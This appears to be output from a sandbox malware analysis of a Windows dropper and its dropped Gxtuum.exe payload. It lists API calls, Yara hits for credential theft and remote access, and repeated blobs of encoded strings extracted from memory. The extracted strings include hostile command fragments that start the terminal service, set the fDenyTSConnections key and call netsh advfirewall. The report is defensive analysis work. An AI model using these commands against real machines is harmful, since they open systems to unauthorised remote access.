Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetLocaleInfoW, 0_2_000B2758
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetLocaleInfoW, 0_2_000A877E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_000B2827
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_000B1EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 1_2_009120C1
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 1_2_009121B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 1_2_00912168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_009122D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 1_2_0090825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 1_2_0091224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 1_2_0091252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00912652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 1_2_00912758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 1_2_0090877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_00912827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00911EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 2_2_009121B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 2_2_00912168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_009122D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 2_2_0090825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW, 2_2_0091224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 2_2_0091252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_00912652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 2_2_00912758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW, 2_2_0090877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00912827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00911EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe VolumeInformation
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A655 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0009A655
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000761F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 0_2_000761F0
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000AE72E _free,_free,_free,GetTimeZoneInformation,_free, 0_2_000AE72E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000793D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo, 0_2_000793D0

Stealing of Sensitive Information
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: XO4ioEY3nq.exe, type: SAMPLE
Source: Yara match | File source: 8.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XO4ioEY3nq.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.XO4ioEY3nq.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED
Source: Yara match | File source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundrive.exe PID: 6176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eafkou.exe PID: 6520, type: MEMORYSTR

Remote Access Functionality
Source: Yara match | File source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundrive.exe PID: 6176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eafkou.exe PID: 6520, type: MEMORYSTR
Source: XO4ioEY3nq.exe | String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000000.2072086835.00000000000C1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: net start termservice
                          Source: XO4ioEY3nq.exe, 00000000.00000000.2072086835.00000000000C1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: XO4ioEY3nq.exe, 00000000.00000002.2080306878.00000000000C1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000002.2080306878.00000000000C1000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: [run of encoded string data removed]
Source: XO4ioEY3nq.exe, 00000000.00000003.2079187094.000000000729A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000003.2079187094.000000000729A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.2079602445.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.2079602445.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000001.00000002.4538515136.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.4538515136.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.2096114895.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.2096114895.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000002.00000002.2098637123.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000002.2098637123.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000007.00000002.2559939352.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000007.00000002.2559939352.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000007.00000000.2556873378.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000007.00000000.2556873378.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000008.00000000.3146381774.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000008.00000000.3146381774.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000008.00000002.3148418384.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000008.00000002.3148418384.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
Source: Gxtuum.exe, 00000009.00000000.3746394163.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000009.00000000.3746394163.0000000000921000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: [run of encoded string data removed]
                          Source: Gxtuum.exe, 00000009.00000002.3748724251.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000009.00000002.3748724251.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000A.00000000.4346447604.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000A.00000000.4346447604.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000A.00000002.4348591318.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000A.00000002.4348591318.0000000000921000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 